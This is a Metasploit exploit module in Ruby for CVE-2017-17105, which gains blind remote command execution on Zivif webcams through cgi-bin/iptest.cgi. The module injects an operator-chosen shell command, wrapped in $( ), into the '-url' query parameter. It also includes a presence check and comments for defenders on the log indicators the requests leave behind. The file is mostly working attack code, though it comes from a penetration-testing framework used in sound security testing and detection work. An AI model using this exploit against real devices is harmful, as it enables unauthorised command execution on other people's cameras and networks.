rapid7


GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/http/zivif_ipcheck_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit module for CVE-2017-17105 (Zivif camera iptest.cgi).
#
# Per the module description, affected firmware is v2.3.4.2103 and earlier.
#
# Notes for defenders reading this module:
# - Every request built here targets the cgi-bin/iptest.cgi path, and the
#   exploit request carries a `-url` query parameter whose value starts with
#   `$(`. The module itself declares IOC_IN_LOGS, so these requests are
#   expected to be visible wherever query strings are logged (device, proxy
#   or network sensor) -- assuming such logging exists; verify per deployment.
# - The command is delivered blind: the module never reads command output,
#   it only looks at the HTTP status code of the reply.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] caller-supplied metadata merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Zivif Camera iptest.cgi Blind Remote Command Execution',
        'Description' => %q{
          This module exploits a remote command execution vulnerability in Zivif
          webcams. This is known to impact versions prior to and including v2.3.4.2103.
          Exploit was reported in CVE-2017-17105.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Silas Cutler (p1nk)' ],
        'References' => [
          [ 'URL', 'https://seclists.org/fulldisclosure/2017/Dec/42' ],
          [ 'CVE', '2017-17105' ]
        ],
        'Platform' => 'unix',
        'Targets' => [
          [ 'Automatic Target', {} ]
        ],
        # Command-type payloads only; NUL and single quote are declared as bad characters.
        'Payload' => {
          'Space' => 1024,
          'BadChars' => "\x00\x27",
          'DisableNops' => true,
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic'
          }
        },
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/generic'
        },
        'Privileged' => false,
        'DisclosureDate' => '2017-09-01',
        'DefaultTarget' => 0,
        # IOC_IN_LOGS: the module declares that its requests leave log artifacts.
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ]
        }
      )
    )
  end

  # Probes for the iptest.cgi endpoint.
  #
  # This is a presence check only: an HTTP 200 yields Detected, any other
  # status yields Safe, and no reply yields Unknown. No firmware version is
  # inspected, so Detected does not confirm that the device is vulnerable.
  #
  # @return [CheckCode] Unknown, Safe or Detected as described above
  def check
    response = send_request_cgi('uri' => normalize_uri('cgi-bin', 'iptest.cgi'))

    unless response
      vprint_error('Connection failed')
      return Exploit::CheckCode::Unknown
    end

    response.code == 200 ? CheckCode::Detected : CheckCode::Safe
  end

  # Sends the single GET request that carries the operator's command.
  #
  # The command is read from the CMD datastore option and wrapped in `$( )`
  # inside the `-url` query parameter. The reply body is never examined:
  # 'Command sent successfully' only means the endpoint answered HTTP 200,
  # not that the command ran.
  #
  # Fails with Failure::Unreachable when there is no reply and with
  # Failure::UnexpectedReply on any status other than 200.
  def exploit
    print_status('Sending request')

    query = {
      'cmd' => 'iptest.cgi',
      '-time' => Time.now.to_i,
      '-url' => "$(#{datastore['CMD']})"
    }
    response = send_request_cgi(
      'uri' => normalize_uri('cgi-bin', 'iptest.cgi'),
      'method' => 'GET',
      'vars_get' => query
    )

    # fail_with raises, so each guard below ends the run when it fires.
    fail_with(Failure::Unreachable, 'Connection failed') unless response
    fail_with(Failure::UnexpectedReply, 'Unable to send command to target') unless response.code == 200

    print_good('Command sent successfully')
  end

end